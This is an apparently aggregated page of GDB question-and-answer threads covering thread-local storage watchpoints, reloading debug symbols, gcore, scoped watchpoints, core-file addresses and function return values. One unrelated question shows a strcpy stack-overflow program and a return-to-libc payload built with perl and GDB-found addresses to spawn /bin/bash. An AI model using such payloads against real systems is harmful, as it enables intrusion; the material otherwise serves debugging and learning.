Is it possible to set a watchpoint on pthread's thread-local storage using GDB? I have a program that runs:
struct stored_type *res = pthread_getspecific(tls_key);
...and after a few thousand calls it returns 0 instead of a valid pointer. I'd really love to figure out what's setting that value to 0. I've tried setting breakpoints on pthread_setspecific and pthread_delete_key (the only things I could think of that would reasonably cause the key to change value) and those breakpoints aren't getting hit, so I'm thinking there's some kind of overrun happening.
I'm using Linux x86_64 with glibc 2.23.
... the only things I could think of that would reasonably cause the key to change value
The most likely reasons for pthread_getspecific to return NULL:
you are in fact executing in a new thread, one in which pthread_setspecific hasn't been called,
you are calling pthread_getspecific while current thread is in the process of being destroyed (i.e. pthread_exit is somewhere on the stack),
you are calling pthread_getspecific in a signal handler (none of pthread_* functions are async-signal safe).
Assuming none of the above reasons are true in your case, on with the show.
First we need a test case to demonstrate on.
#include <assert.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
pthread_key_t key;
void *thrfn(void *p) {
int rc = pthread_setspecific(key, &p);
assert(rc == 0);
sleep(60);
rc = pthread_setspecific(key, (void*)0x112233);
assert(rc == 0);
return p;
}
int main()
{
pthread_t thr;
int rc = pthread_key_create(&key, NULL);
assert(rc == 0);
rc = pthread_create(&thr, NULL, thrfn, NULL);
assert(rc == 0);
sleep(90);
return 0;
}
gcc -g -pthread t.c
gdb -q ./a.out
(gdb) start
Now, it helps very much to have GLIBC that is compiled with debug info. Most distributions provide a libc-dbg or similar package, which supplies that. Looking at pthread_setspecific source, you can see that inside the thread descriptor (self) there is a specific_1stblock array, where the space for first PTHREAD_KEY_2NDLEVEL_SIZE == 32 key slots is pre-allocated (32 distinct keys is usually more than enough).
The value that we pass will be stored in self->specific_1stblock[key].data, and that's exactly the location you'll want to set the watchpoint on.
In our sample program, key == 0 (as this is the very first key). Putting it all together:
Starting program: /tmp/a.out
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Temporary breakpoint 1, main () at t.c:21
21 int rc = pthread_key_create(&key, NULL);
(gdb) b pthread_setspecific
Breakpoint 2 at 0x7ffff7bc9460: file pthread_setspecific.c, line 28.
(gdb) c
Continuing.
[New Thread 0x7ffff77f6700 (LWP 58683)]
[Switching to Thread 0x7ffff77f6700 (LWP 58683)]
Breakpoint 2, __GI___pthread_setspecific (key=0, value=0x7ffff77f5ef8) at pthread_setspecific.c:28
28 pthread_setspecific.c: No such file or directory.
(gdb) n
35 in pthread_setspecific.c
(gdb) n
28 in pthread_setspecific.c
(gdb) p self
$1 = (struct pthread *) 0x7ffff77f6700
(gdb) watch -l self.specific_1stblock[key].data
Hardware watchpoint 3: -location self.specific_1stblock[key].data
(gdb) c
Continuing.
Hardware watchpoint 3: -location self.specific_1stblock[key].data
Old value = (void *) 0x0
New value = (void *) 0x7ffff77f5ef8
__GI___pthread_setspecific (key=<optimized out>, value=0x7ffff77f5ef8) at pthread_setspecific.c:89
89 in pthread_setspecific.c
Note that the new value is exactly the value that we passed to pthread_setspecific.
(gdb) c
Continuing.
Breakpoint 2, __GI___pthread_setspecific (key=0, value=0x112233) at pthread_setspecific.c:28
28 in pthread_setspecific.c
(gdb) c
Continuing.
Hardware watchpoint 3: -location self.specific_1stblock[key].data
Old value = (void *) 0x7ffff77f5ef8
New value = (void *) 0x112233
__GI___pthread_setspecific (key=<optimized out>, value=0x112233) at pthread_setspecific.c:89
89 in pthread_setspecific.c
This is our second pthread_setspecific call
(gdb) c
Continuing.
Hardware watchpoint 3: -location self.specific_1stblock[key].data
Old value = (void *) 0x112233
New value = (void *) 0x0
__nptl_deallocate_tsd () at pthread_create.c:152
152 pthread_create.c: No such file or directory.
And this is thread destruction, which deallocates the thread descriptor itself.
(gdb) c
Continuing.
[Thread 0x7ffff77f6700 (LWP 58683) exited]
[Inferior 1 (process 58677) exited normally]
Related
My distribution (Debian) ships debug files in separate packages. So what happens often is that I run a program in gdb until it crashes, in order to obtain a usable backtrace for a bug report. But bt is rather useless, missing the symbol information – because I did not install the corresponding -dbg package.
If I install the package now, is there a way to make gdb search for the symbol files again, without losing my current backtrace?
There is a trick you can use to make gdb try to read symbol files again:
(gdb) nosharedlibrary
(gdb) sharedlibrary
The first command tells it to forget all the symbol information it has, and the second command tells it to re-read it.
I am going to suggest an alternative approach with gdb gcore command, possibly it is suitable for you.
This is gcore description:
(gdb) help gcore
Save a core file with the current state of the debugged process.
Argument is optional filename. Default filename is 'core.<process_id>'
So I have a program that causes a crash:
include <iostream>
int f()
{
time_t curr_ts = time(0);
std::cout << "Before crash " << curr_ts << std::endl;
int * ptr = 0;
*ptr = *ptr +1 ;
std::cout << "After crash " << curr_ts << std::endl;
return *ptr;
}
int main()
{
std::cout << "Before f() " << std::endl;
f();
std::cout << "After f() " << std::endl;
return 0;
}
I compiled it with debug info. However I put the executable with debug info in an archive and for tests use a stripped version.
So it crashes under gdb:
$ gdb ./a.out
Reading symbols from ./a.out...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/crash/a.out
Before f()
Before crash 1435322344
Program received signal SIGSEGV, Segmentation fault.
0x000000000040097d in ?? ()
(gdb) bt
#0 0x000000000040097d in ?? ()
#1 0x00000000004009e0 in ?? ()
#2 0x000000314981ed1d in __libc_start_main () from /lib64/libc.so.6
#3 0x00000000004007f9 in ?? ()
#4 0x00007fffffffde58 in ?? ()
#5 0x000000000000001c in ?? ()
#6 0x0000000000000001 in ?? ()
#7 0x00007fffffffe1a9 in ?? ()
#8 0x0000000000000000 in ?? ()
(gdb) gcore crash2.core
Saved corefile crash2.core
I simply generate core file with gcore and leave gdb. Then I get from the archive the version with debug symbols and I can see all symbols:
$ gdb ./a.out ./crash2.core
Reading symbols from ./a.out...done.
warning: exec file is newer than core file.
[New LWP 15215]
Core was generated by `/home/crash/a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x000000000040097d in f () at main.cpp:8
8 *ptr = *ptr +1 ;
(gdb) bt
#0 0x000000000040097d in f () at main.cpp:8
#1 0x00000000004009e0 in main () at main.cpp:17
(gdb) info locals
curr_ts = 1435322344
ptr = 0x0
Update
if you set backtrace past-main on you will see at least this __libc_start_main. What is above __libc_start_main is not printed if you analyze only core file (possibly even not saved there) saved wit gcore:
$ gdb ./a.out crash2.core
Reading symbols from ./a.out...done.
warning: exec file is newer than core file.
[New LWP 15215]
Core was generated by `/home/crash/a.out'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x000000000040097d in f () at main.cpp:8
8 *ptr = *ptr +1 ;
(gdb) set backtrace past-main on
(gdb) bt
#0 0x000000000040097d in f () at main.cpp:8
#1 0x00000000004009e0 in main () at main.cpp:17
#2 0x000000314981ed1d in __libc_start_main () from /lib64/libc.so.6
Backtrace stopped: Cannot access memory at address 0x4007d0
(gdb)
But if I reproduce the crash under gdb with my test program (with debug info in it) I can see all (see set backtrace past-main on && set backtrace past-entry on):
$ gdb ./a.out
Reading symbols from ./a.out...done.
(gdb) r
Starting program: /home/crash/a.out
Before f()
Before crash 1435328858
Program received signal SIGSEGV, Segmentation fault.
0x000000000040097d in f () at main.cpp:8
8 *ptr = *ptr +1 ;
(gdb) bt
#0 0x000000000040097d in f () at main.cpp:8
#1 0x00000000004009e0 in main () at main.cpp:17
(gdb) set backtrace past-main on
(gdb) set backtrace past-entry on
(gdb) bt
#0 0x000000000040097d in f () at main.cpp:8
#1 0x00000000004009e0 in main () at main.cpp:17
#2 0x000000314981ed1d in __libc_start_main () from /lib64/libc.so.6
#3 0x00000000004007f9 in _start ()
#4 0x00007fffffffde58 in ?? ()
#5 0x000000000000001c in ?? ()
#6 0x0000000000000001 in ?? ()
#7 0x00007fffffffe1a9 in ?? ()
#8 0x0000000000000000 in ?? ()
(gdb)
Watchpoints on function-local variables usually get removed upon the function return, with a message «Watchpoint 7 deleted because the program has left the block in». Illustration:
struct mystruct{
int a, b, c;
};
void MyFunc(){
mystruct obj;
obj.a = 2;
}
int main(){
MyFunc();
}
gdb session example
(gdb) b 7
Breakpoint 1 at 0x4004f1: file /tmp/test2.cpp, line 7.
(gdb) r
Starting program: /tmp/test2
Breakpoint 1, MyFunc () at /tmp/test2.cpp:7
7 obj.a = 2;
(gdb) wa obj
Hardware watchpoint 2: obj
(gdb) c
Continuing.
Hardware watchpoint 2: obj
Old value = {a = 4195600, b = 0, c = 4195328}
New value = {a = 2, b = 0, c = 4195328}
MyFunc () at /tmp/test2.cpp:8
8 }
(gdb) c
Continuing.
Watchpoint 2 deleted because the program has left the block in
which its expression is valid.
main () at /tmp/test2.cpp:12
12 }
I tried casting it like wa *(mystruct *)&obj and wa *(mystruct *)(void*)&obj, to no avail.
I need it because GDB on embedded ARM device I'm working with is broken: sometimes it removes a watchpoint for no reason; backtrace then looks like lines marked with "??" signs, and a message about corrupted stack. Even though application is actually fine.
As GDB: Setting Watchpoints says,
GDB automatically deletes watchpoints that watch local (automatic) variables, or expressions that involve such variables, when they go out of scope, that is, when the execution leaves the block in which these variables were defined.
However, as of release 7.3 (thanks to #Hi-Angel and user parcs on IRC for pointing this out; I missed seeing it right there in the documentation), the watch command accepts a -location argument:
Ordinarily a watchpoint respects the scope of variables in expr (see below). The -location argument tells GDB to instead watch the memory referred to by expr. In this case, GDB will evaluate expr, take the address of the result, and watch the memory at that address. The type of the result is used to determine the size of the watched memory.
On older versions of GDB, you can run this instead, using the example from your question:
eval "watch *(mystruct *)%p", &obj
Note that watching locations on the stack may cause spurious notifications if the memory you're watching gets reused by another function's local variables.
As an alternative, you can automate the setting of a watchpoint on an automatic variable that keeps coming into and out of scope. Set a breakpoint at a point where it's in scope - for example, at the beginning of the function or block in which it's declared - then attach a watch and continue command:
(gdb) break MyFunc
(gdb) commands $bpnum
>watch obj
>continue
>end
The program I want to attack is the following:
int main(int argc, char *argv[])
{
char buffer[256];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
It is in redhat 6.2, so I didn't think there was anything to consider.
So I tried this:
(gdb) b main
Breakpoint 1 at 0x8048439
(gdb) r
Starting program: /home/asdf/asdfghj
Breakpoint 1, 0x8048439 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) x/s 0xbfffff8e
0xbfffff8e: "/bin/bash"
(gdb) q
So my payload looked like this, the first 260 bytes being the buffer+sfp, then the address of the system function, a 4 byte dummy, and the address of the argument, "/bin/bash".
./asdfghj `perl -e 'print "\x90"x260, "\xe0\x8a\x05\x40", "AAAA", "\x8e\xff\xff\xbf"'`
However this still gives me only a segmentation fault. I have no idea how to fix this, and the addresses come from the dumped core of the program which I set a breakpoint, ran it, then got the addresses.
What should I check to successfully attack the program and what do you think is the problem? Is it that I use /bin/bash, or any of the addresses incorrect?
Plus, I've already set bash2 for default.
Thanks. :)
I am noticing a strange problem when I attempt to use the signal handler to dump global data to a text file and generate the core file. I would expect the data dumped to the file to be the same as that is present in the core file (it is the same global data)
in a header file foo.h
extern char buffer[100][80] ; // Hundred records each of length 80 characters
in foo.c
char buffer[100][80];
.. in a loop ..
snprintf(buffer[i],80,"%s:%d recorded idx = %d\n",__FUNCTION__,__LINE__,i);
in signal_handler.c
.. in a loop ..
fprintf(..dump data to text file..)
The data is dumped to the text file alright. I run the program in gdb and I issue the ABRT signal (the signal I am handling) via kill. In gdb I see
gdb) p &buffer[0]
$3 = (char (*)[80]) 0x1002c8970
I continue and generate the core file. In the core dump I see
(gdb) p &buffer[0]
$2 = (char (*)[80]) 0x1002c9a80
the difference between the two positions is 1110.
My question is why do I see this discrepancy in the core file ? Any leads would be appreciated!
Thanks
John
EDIT To clarify, the problem is not in generating the core via GDB
Full code without signal handlers to isolate the problem.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX 100
char buffer[100][80];
int main()
{
int i = 0;
int idx = 0;
FILE *fp = NULL;
fp = fopen("test.txt","w");
if (!fp)
exit(1);
for (i=0; i < 5500; i++) {
snprintf(buffer[idx],80,"%s:%d idx = %d\n",__FUNCTION__, __LINE__, i);
idx = ((idx + 1)% MAX);
}
for (i = 0 ; i < MAX; i++)
fprintf(fp,"%s",buffer[i]);
fclose(fp);
abort();
return 0;
}
The problem is not when I am trying to run in GDB, the problem is that in the core file generated,
gdb) p buffer[0]
$2 "c0 - idx = 54\n", '\0' , "main:20 0x7ef9524"
the buffer is offset by 1110 bytes. I had used GDB to check if the buffer was corrupted. Sorry about the confusion.
Please provide a stand-alone example. I can explain different address when the core is produced from outside GDB, but not when it is produced from inside GDB.
Here is what I see:
$ cat foo.c
#include <stdio.h>
#include <stdlib.h>
char buf[100][80];
int main()
{
sprintf(buf[0], "hello");
sprintf(buf[1], "hello again");
abort();
}
$ gcc -g foo.c -fPIC -pie # PIE executable so its address can be randomized
$ gdb -q a.out
Reading symbols from /tmp/a.out...done.
(gdb) r
Program received signal SIGABRT, Aborted.
0x00007ffff7a8ca75 in raise () at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
(gdb) p &buf[0]
$1 = (char (*)[80]) 0x7ffff81ff060
(gdb) sig SIGABRT
Program terminated with signal SIGABRT, Aborted.
The program no longer exists.
(gdb) q
$ gdb -q a.out core
Reading symbols from /tmp/a.out...done.
[New Thread 20440]
Core was generated by `/tmp/a.out'.
Program terminated with signal 6, Aborted.
#0 0x00007ffff7a8ca75 in raise () at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
(gdb) p &buf[0]
$1 = (char (*)[80]) 0x7ffff81ff060 # same address as before
(gdb) q
$ ./a.out
Aborted (core dumped)
$ gdb -q a.out core
Reading symbols from /tmp/a.out...done.
[New Thread 20448]
Core was generated by `./a.out'.
Program terminated with signal 6, Aborted.
#0 0x00007fef9dcb5a75 in raise () at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
(gdb) p &buf[0]
$1 = (char (*)[80]) 0x7fef9e428060 # different address due to ASLR
Is it possible to inspect the return value of a function in gdb assuming the return value is not assigned to a variable?
I imagine there are better ways to do it, but the finish command executes until the current stack frame is popped off and prints the return value -- given the program
int fun() {
return 42;
}
int main( int argc, char *v[] ) {
fun();
return 0;
}
You can debug it as such --
(gdb) r
Starting program: /usr/home/hark/a.out
Breakpoint 1, fun () at test.c:2
2 return 42;
(gdb) finish
Run till exit from #0 fun () at test.c:2
main () at test.c:7
7 return 0;
Value returned is $1 = 42
(gdb)
The finish command can be abbreviated as fin. Do NOT use the f, which is abbreviation of frame command!
Yes, just examine the EAX register by typing print $eax. For most functions, the return value is stored in that register, even if it's not used.
The exceptions to this are functions returning types larger than 32 bits, specifically 64-bit integers (long long), doubles, and structs or classes.
The other exception is if you're not running on an Intel architecture. In that case, you'll have to figure out which register is used, if any.
Here's how todo this with no symbols.
gdb ls
This GDB was configured as "ppc64-yellowdog-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib64/libthread_db.so.1".
(gdb) break __libc_start_main
Breakpoint 1 at 0x10013cb0
(gdb) r
Starting program: /bin/ls
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Breakpoint 1 at 0xfdfed3c
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 4160418656 (LWP 10650)]
(no debugging symbols found)
(no debugging symbols found)
[Switching to Thread 4160418656 (LWP 10650)]
Breakpoint 1, 0x0fdfed3c in __libc_start_main () from /lib/libc.so.6
(gdb) info frame
Stack level 0, frame at 0xffd719a0:
pc = 0xfdfed3c in __libc_start_main; saved pc 0x0
called by frame at 0x0
Arglist at 0xffd71970, args:
Locals at 0xffd71970, Previous frame's sp is 0xffd719a0
Saved registers:
r24 at 0xffd71980, r25 at 0xffd71984, r26 at 0xffd71988, r27 at 0xffd7198c,
r28 at 0xffd71990, r29 at 0xffd71994, r30 at 0xffd71998, r31 at 0xffd7199c,
pc at 0xffd719a4, lr at 0xffd719a4
(gdb) frame 0
#0 0x0fdfed3c in __libc_start_main () from /lib/libc.so.6
(gdb) info fr
Stack level 0, frame at 0xffd719a0:
pc = 0xfdfed3c in __libc_start_main; saved pc 0x0
called by frame at 0x0
Arglist at 0xffd71970, args:
Locals at 0xffd71970, Previous frame's sp is 0xffd719a0
Saved registers:
r24 at 0xffd71980, r25 at 0xffd71984, r26 at 0xffd71988, r27 at 0xffd7198c,
r28 at 0xffd71990, r29 at 0xffd71994, r30 at 0xffd71998, r31 at 0xffd7199c,
pc at 0xffd719a4, lr at 0xffd719a4
Formatting kinda messed up there, note the use of "info frame" to inspect frames, and "frame #" to navigate your context to another context (up and down the stack)
bt also show's an abbreviated stack to help out.